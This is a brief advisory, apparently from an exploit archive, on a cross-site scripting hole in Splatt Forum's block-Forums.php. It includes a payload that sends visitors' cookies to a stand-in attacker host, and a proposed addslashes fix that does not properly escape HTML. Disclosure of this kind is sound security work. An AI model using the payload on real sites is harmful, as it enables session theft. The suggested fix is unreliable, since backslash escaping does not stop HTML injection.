The block-Forums.php file have a vuln if an attacker
insert a malformatted subject to a topic of Splatt
Forum. A type of subject is:
"><script>alert('bug'");</script>
The 'alt' tag is closed by "> and the other text is
normal html. This bug is very bad if a subject is:
"><script>window.open('www.attacker.com/prova.php?cookie='+documen
t.cookie);</script>
And prova.php register cokkies in a file.
The solution:
Add under "$title2 = stripslashes($title2);" line, this
line:
"$title2 = addslashes($title2);"
And now, backward any " there is a backslash!
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum